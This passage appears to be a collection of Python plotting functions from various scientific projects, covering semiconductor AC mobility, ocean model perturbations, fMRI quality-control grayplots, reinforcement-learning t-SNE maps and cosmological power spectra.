pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.3 'original' is corresponds to the landscapes in other figures)\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, '-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def fig_2():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig2.png'\n posteriors_plot(model, features, filters, figname, idx=-3)", "def linear_mobility_paperplot(fieldVector,df):\n vcm = np.array(fieldVector) * 1e-2\n lw = 1.5\n mu_1 = []\n mu_2 = []\n mu_3 = []\n meanE_1 = []\n meanE_2 = []\n meanE_3 = []\n for ee in fieldVector:\n chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + \"E_{:.1e}.npy\".format(ee))\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4)\n mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4)\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n meanE_1.append(utilities.mean_energy(chi_1_i,df))\n meanE_2.append(utilities.mean_energy(chi_2_i,df))\n meanE_3.append(utilities.mean_energy(chi_3_i,df))\n\n plt.figure(figsize=(2.05,2.5))\n # ax = plt.axes([0.2, 0.19, 0.75, 0.76])\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n mufac = 1000\n # mufac = 1000\n ax.plot(vcm, np.array(mu_3)/mufac, '-', linewidth=lw, label='Warm', color=warm_color)\n ax.plot(vcm, np.array(mu_2)/mufac, '--', linewidth=lw, label='Cold', color=cold_color)\n ax.plot(vcm, np.array(mu_1)/mufac, '--', linewidth=lw, label='RTA', color=rta_color)\n\n plt.xlim([0,np.max(fieldVector)/100])\n plt.xlabel(r'Electric field ($\\rm V \\, cm^{-1}$)')\n # plt.ylabel(r'$\\sigma^{\\omega = 0}_{\\parallel}$ ($\\rm cm^2 \\, kV^{-1}\\, s^{-1}$)')\n plt.ylabel(r'DC mobility (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n plt.ylim([0.8e4/mufac, 2e4/mufac])\n ax.locator_params(axis='x', nbins=6)\n # plt.legend(ncol=3,loc='lower center',frameon=False)\n plt.legend(frameon=False)\n plt.savefig(pp.figureLoc +'linear_mobility2.png',dpi=600)\n\n plt.figure()\n lw = 2\n plt.plot(vcm,(np.array(meanE_1) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='RTA')\n plt.plot(vcm,(np.array(meanE_2) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Cold '+r'$e^{-}$')\n plt.plot(vcm,(np.array(meanE_3) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Warm '+r'$e^{-}$')\n plt.xlabel(r'Electric field [$kV/cm$]')\n plt.ylabel(r'Mean Energy [meV]')\n plt.title(pp.title_str)\n plt.savefig(pp.figureLoc +'meanEnergy_vField.png', bbox_inches='tight',dpi=600)\n plt.legend(frameon=False)", "def fig_4():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig4.png'\n xx_plot(epoch, model, features, filters, figname)", "def plot_dmstep(self):\n\n x, y = self._calculate_snr_spread()\n\n # Attach a curve\n curve = Qwt.QwtPlotCurve()\n curve.attach(self)\n curve.setPen(Qt.QPen(Qt.Qt.blue, 2))\n curve.setData(x, y)\n \n self.replot()", "def grayplot_NH(QC,stage):\n\n\n #set some constants\n numpts=QC['GMtcs'].shape[1] #number of timepoints\n rightsignallim = np.arange(-20,21,20) #GS, main plot signal limits - 2% assuming mode 1000 normalization\n leftsignallim = np.arange(0,21,10) #DVars limits\n rylimz=[np.min(rightsignallim),np.max(rightsignallim)]\n lylimz=[np.min(leftsignallim),np.max(leftsignallim)]\n FDmult = 10 #multiplier to FD to get in range of DVars values\n FDthresh = 0.2 #FD threshold to mark frame for scrubbing (use 0.1 for filtered FD)\n\n #compute data quality metrics -- CG: compute by hand to better understand (separated here for practice)\n [mvm,ddt_mvm,FD] = compute_FD(QC['MVM'])\n DVars = compute_DVARS(QC['GMtcs'][:,:,stage]) # compute DVARs for a particular processing stage\n GS = compute_GS(QC['GMtcs'][:,:,stage]) # compute global signal for a particular processing stage\n\n #create plot\n fig = plt.figure(figsize=(10,10),constrained_layout = True)\n gs = GridSpec(9,1,figure=fig)\n\n #plot individual mvm params\n ax1 = fig.add_subplot(gs[0:2])\n pointindex = np.arange(1,numpts+1)\n plt.plot(pointindex,mvm)\n\n plt.xlim([0, numpts])\n plt.ylim([-1.5, 1.5])\n plt.ylabel('mvm-XYZPYR')\n\n #Next, plot FD, DVARS and GS on the same plot\n ax2a = fig.add_subplot(gs[2:4])\n ax2b = ax2a.twinx()\n ax2a.plot(pointindex,DVars,color=[0,0,1],alpha=0.5)\n ax2b.plot(pointindex,GS,color=[0,1,0],alpha=0.5)\n ax2a.plot(pointindex,FD*FDmult,color=[1,0,0],alpha=0.5)\n ax2a.hlines(FDthresh*FDmult,pointindex[0],pointindex[-1],'k',alpha=0.5)\n \n plt.xlim([0, numpts])\n ax2a.set_ylim(lylimz)\n ax2a.set_yticks(leftsignallim)\n ax2b.set_ylim(rylimz)\n ax2b.set_yticks(rightsignallim)\n ax2a.set_ylabel('R:FD*' + str(FDmult) +' B:DV G:GS')\n\n #next plot gray matter signal\n ax3 = fig.add_subplot(gs[4:8])\n new_GMtcs = QC['GMtcs'][:,:,stage]\n plt.imshow(new_GMtcs,cmap='gray',vmin=-20,vmax=20,aspect='auto') #default: showing 2% signal on mode 1000 norm\n plt.ylabel('GRAY')\n\n #finally, plot WM and CSF ts\n ax4 = fig.add_subplot(gs[8:])\n new_WMCSF = np.vstack((QC['WMtcs'][:,:,stage],QC['CSFtcs'][:,:,stage]))\n plt.imshow(new_WMCSF,cmap='gray',vmin=-20,vmax=20,aspect='auto')\n plt.ylabel('WM CSF')\n plt.xlabel('frames')\n\n return fig", "def plot(self):\n\t\tplot_chain(self.database_path, self.temp_folder)\n\t\tplot_density(self.database_path, self.temp_folder, self.cal_params)", "def plot_dmd(self):\n n_modes = 10\n U = self.uf\n # put the decomposition axis last\n UT = U.transpose(0, 2, 1)\n # create the matrix of snapshots by flattening the non\n # decomp axes so we have a 2d array where we index the\n # decomp axis like snapshots[:,i]\n snapshots = UT.reshape((-1, UT.shape[-1]))\n\n # remove nans\n # TODO: remove nans by interpolation earlier on\n snapshots[np.where(np.isnan(snapshots))] = 0\n\n modes, ritz_values, norms \\\n = mr.compute_DMD_matrices_snaps_method(snapshots, range(n_modes))\n\n # as array, reshape to data dims\n reshaped_modes = modes.A.T.reshape((-1,) + UT.shape[:-1])\n\n fig, ax = plt.subplots(nrows=3)\n c0 = self.mean_velocity_Uf(ax[0])\n\n ax[1].set_title('First mode of DMD')\n ax[1].set_xlabel('time after front passage')\n ax[1].set_ylabel('height')\n c1 = ax[1].contourf(reshaped_modes[0], 100)\n\n ax[2].set_title('Second mode of DMD')\n ax[2].set_xlabel('time after front passage')\n ax[2].set_ylabel('height')\n # TODO: why does reshaped_modes seem to have a list of\n # duplicates?\n # Seems to be complex conjugates - why is this??\n c2 = ax[2].contourf(reshaped_modes[2], 100, levels=c1.levels)\n\n fig.colorbar(c0, ax=ax[0], use_gridspec=True)\n fig.colorbar(c1, ax=ax[1], use_gridspec=True)\n fig.colorbar(c2, ax=ax[2], use_gridspec=True)\n\n fig.tight_layout()\n\n return fig", "def dk_plotting():\n heatmap_mode1_error_x(make_heatmap=False, make_panel=True)\n\n #heatmap_mode1_error_x()\n figure_2_combined_cross_sections()\n\n #heatmap_combined_error_c()\n #heatmap_combined_error_koff()\n #heatmap_kpr_error_c()\n #heatmap_kpr_error_koff()\n\n #heatmap_kpr2_error_c()\n #heatmap_kpr2_error_koff()\n\n ctildePosterior = [truncate(f, 3) for f in list(np.arange(0.0 * KON / KP, 5.0 * KON / KP + 0.005, 0.005))[1:]]\n kofftildePosterior = [truncate(f, 2) for f in list(np.arange(0.0 / KP, 50.0 / KP + 0.05, 0.05))[1:]]\n\n #heatmap_figure_4()\n\n return 0", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def _plot(self, rewards, losses, epsilons):\n plt.figure(figsize=(20,5))\n plt.subplot(131)\n plt.title('Episodic Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('TD Loss')\n plt.plot(losses)\n plt.subplot(133)\n plt.title('Epsilon')\n plt.plot(epsilons)\n plt.tight_layout()\n plt.show()", "def plot_pade_figure(self):\n data_analysis = DatabaseData(dataframe=self.plot_data)\n print (data_analysis.dataframe.columns)\n data_analysis.run_pade_through_R(rscript='birch',get_inits_ev=True)\n data_analysis.create_precisions()\n data_analysis.extract_pade_curve()\n x_eos_kpts, y_eos, xs_err, ys_err, x_pade_kpts, y_pade = \\\n data_analysis.create_pade_bokeh_compat(properties=self.properties)\n print (type(self.properties), self.properties)\n if self.properties == 'B':\n ext = data_analysis.Bp\n print ('HERE AT PROPERTIES', ext, type(ext))\n elif self.properties == 'BP':\n ext = data_analysis.BPp\n elif self.properties == 'E0':\n ext = data_analysis.E0p\n elif self.properties == 'V0':\n ext = data_analysis.V0p\n p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n x_axis_type=\"log\", x_axis_label='K-points per atom', title='Pade Extrapolate of {0} is {1}'.format(self.properties, str(ext)) )\n p.xaxis.axis_label = 'K-points per atom'\n p.line(x_pade_kpts, y_pade, color='red')\n p.circle(x_eos_kpts, y_eos,color='blue',size=5, line_alpha=0)\n p.multi_line(xs_err, ys_err, color='black')\n if self.properties == 'B':\n p.yaxis.axis_label = 'Bulk Modulus B (GPa)'\n elif self.properties == 'dB':\n p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative'\n elif self.properties == 'E0':\n p.yaxis.axis_label = 'DFT Energy (eV/atom)'\n elif self.properties == 'V0':\n p.yaxis.axis_label = 'Volume (A^3/atom)'\n\n return p", "def plot_ps(self, show=False, density=True, pcolor=\"r\", mcolor=\"b\", lw=0.6):\n\n if (density):\n \"\"\" also read the local overdeOptimization of spectroscopic surveys for testing non-Gaussianity\nnsity value and plot line colors according to\n the density value, + = red, - = blue; adjust alpha accordingly\n \"\"\"\n if len(self.ds)<self.Nsubs:\n print (\"no density data\")\n return 0\n ads=np.abs(self.ds)\n meands=np.mean(self.ds)\n mads=np.max(ads)\n normds=np.array([ads[i]/mads/1.5 for i in range(len(ads))])\n self.normds=normds\n\n for sub in range(self.Nsubs):\n #print sub\n if not(density):\n self.plt.plot(self.klist, self.pfactor*self.powerspectra[sub])\n else:\n if self.ds[sub]>meands:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=pcolor, alpha=normds[sub], linewidth=lw)\n else:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=mcolor, alpha=normds[sub], linewidth=lw)\n #self.plt.xlim(self.klist[1], 0.1)\n #if (self.normalized):\n # self.plt.ylim(0.0,2)\n #else:\n # self.plt.ylim(500, 50000)\n # self.plt.yscale('log')\n\n self.plt.xlabel(r\"$k {\\rm (h/Mpc)}$\")\n if (self.normalized):\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)/ P_{\\rm avg}(k)$\")\n self.plt.yscale('linear')\n else:\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)\\; {\\rm (Mpc/h)}^3$\")\n self.plt.yscale('log')\n\n if (show):\n self.plt.show()", "def plot_decompose(self):\n try:\n assert self._arr_seasonal is not None\n except AssertionError:\n self.ts_decompose()\n\n fig, axes = plt.subplots(5, 1, figsize=(20, 9), sharex=True)\n axes[0].plot(self._res_decomp.observed)\n axes[0].set_ylabel(\"Original\")\n #\n axes[1].plot(self._arr_trend)\n axes[1].set_ylabel(\"Trend\")\n #\n axes[2].plot(self._arr_seasonal)\n axes[2].set_ylabel(\"Seasonal\")\n #\n axes[3].plot(self._arr_baseline)\n axes[3].set_ylabel(\"Baseline\")\n #\n axes[4].plot(self.residuals)\n axes[4].set_ylabel(\"Residuals\")\n #\n if self.upper_whisker_res is not None:\n axes[4].axhline(y=self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n axes[4].axhline(y=-self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n\n plt.gcf().autofmt_xdate()\n plt.grid(True)\n plt.show()", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def compare_averages_shell_pspec_dft():\n\n select_radius = 5. #degrees\n\n Nside=256\n Npix = 12 * Nside**2\n Omega = 4*np.pi/float(Npix)\n\n Nfreq = 100\n freqs = np.linspace(167.0, 177.0, Nfreq)\n dnu = np.diff(freqs)[0]\n Z = 1420/freqs - 1.\n\n sig = 2.0\n mu = 0.0\n shell = np.random.normal(mu, sig, (Npix, Nfreq))\n\n dV = comoving_voxel_volume(Z[Nfreq/2], dnu, Omega)\n variances = []\n means = []\n pks = []\n\n gs = gridspec.GridSpec(2, 3)\n fig = pl.figure()\n\n ax0 = pl.subplot(gs[0, 0:2])\n ax1 = pl.subplot(gs[1, 0])\n ax3 = pl.subplot(gs[1, 1])\n ax2 = pl.subplot(gs[:, 2])\n\n steps = range(10,110,10)\n vmin,vmax = min(steps),max(steps)\n normalize = mcolors.Normalize(vmin=vmin, vmax=vmax)\n colormap = cm.viridis\n\n for n in steps:\n Nkbins = 100\n kbins, pk = pspec_funcs.shell_project_pspec(shell, Nside, select_radius, freqs=freqs, Nkbins=Nkbins, N_sections=n, cosmo=True, method='dft', error=False)\n variances.append(np.var(pk[0:Nkbins-5]))\n means.append(np.mean(pk[0:Nkbins-5]))\n pks.append(pk)\n ax0.plot(kbins, pk, label=str(n), color=colormap(normalize(n)))\n\n ax0.axhline(y=dV*sig**2, color='k', lw=2.0)\n# ax0.legend()\n 